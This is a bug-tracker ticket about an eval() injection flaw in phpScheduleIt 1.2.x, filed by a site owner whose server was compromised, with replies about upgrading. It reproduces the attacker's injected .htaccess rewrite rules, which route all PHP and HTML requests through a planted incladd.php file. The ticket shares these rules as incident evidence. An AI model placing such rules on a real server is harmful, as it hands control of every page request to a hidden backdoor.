#97 Security: eval() Injection Vulnerability

closed
1.2.0 (31)
9
2014-04-21
2008-12-22
No

http://www.securityfocus.com/bid/31520
http://secunia.com/advisories/32073/

Our site was hacked while using version 1.2.10. Our security team believes that this was the method used to gain access to the site. They added some lines to the .htaccess file, uploaded a file to our /files directory, and uploaded several files in the root directories of our two phpScheduleIt installations.

Lines added to htaccess:
RewriteEngine On
RewriteCond /www/htdocs/web/siteroot/files/incladd.php -f
RewriteCond %{REQUEST_URI} !incladd.php$
RewriteCond %{REQUEST_URI} !73e69772.php$
RewriteRule ^.*.(php[s345]?|[ps]?html?)$ /files/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING} [NC,L]
RewriteEngine On
RewriteCond %{REQUEST_URI} !e27717cd.php$

Discussion

  • Robert McCrory

    Robert McCrory - 2008-12-22

    Archive of files uploaded using eval() Injection

     
  • Pablo

    Pablo - 2011-02-11

    Has anyone come up with a code fix for this vulnerability? We were just compromised as well...

     
  • Nick Korbel

    Nick Korbel - 2011-02-11

    Have you upgraded to 1.2.12?

     
  • Nick Korbel

    Nick Korbel - 2014-04-21
    • Status: open --> closed
     

Log in to post a comment.